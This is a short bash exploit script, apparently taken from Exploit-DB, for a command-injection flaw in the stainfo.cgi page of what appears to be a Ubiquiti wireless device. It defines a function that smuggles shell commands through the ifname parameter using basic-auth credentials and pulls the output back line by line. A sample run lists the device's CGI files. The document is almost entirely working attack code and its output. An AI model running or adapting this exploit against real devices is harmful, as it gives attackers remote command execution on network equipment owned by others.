# Francesco `ascii` Ongaro
# Original exploit: http://www.exploit-db.com/exploits/14146/

$ function nanoexec() { FETCH_TARGET="$1"; FETCH_COMMAND="`echo $3 | php -r 'echo urlencode(trim(file_get_contents("php://stdin")));'`"; echo "Command: $FETCH_COMMAND"; FETCH_AUTH="$2"; FETCH_LINES="`curl -kis "$FETCH_TARGET/stainfo.cgi?ifname=eth0;echo%20-e%20%22foobar\n%60$FETCH_COMMAND|grep%20%22.*%22%20-c%60%22" -H "Authorization: Basic $FETCH_AUTH" | grep "Station &nbsp;" | sed "s/<tr><th.*>Station &nbsp; &nbsp; &nbsp; &nbsp; //g;s/ &nbsp; &nbsp; \[  \]<\/th><\/tr>$//g"`"; echo "Lines to fetch: $FETCH_LINES"; for i in `seq 1 $FETCH_LINES`; do curl -kis "$FETCH_TARGET/stainfo.cgi?ifname=eth0;echo%20-e%20%22foobar\n%60$FETCH_COMMAND|tail%20-n%20$(($FETCH_LINES-$i))%60%22" -H "Authorization: Basic $FETCH_AUTH" | grep "Station &nbsp;" | sed "s/<tr><th.*>Station &nbsp; &nbsp; &nbsp; &nbsp; //g;s/ &nbsp; &nbsp; \[  \]<\/th><\/tr>$//g"; done }

$ nanoexec https://1.2.3.4 ANTANI== "ls -la"
Command: ls+-la
Lines to fetch: 87
-rwx------    1 ubnt     admin        3414 Oct 13 14:56 admin.cgi
-rwxr-x---    1 ubnt     admin        6638 Oct 13 14:56 advanced.cgi
-rw-r--r--    1 ubnt     admin        1313 Oct 13 14:56 ajax.js
^C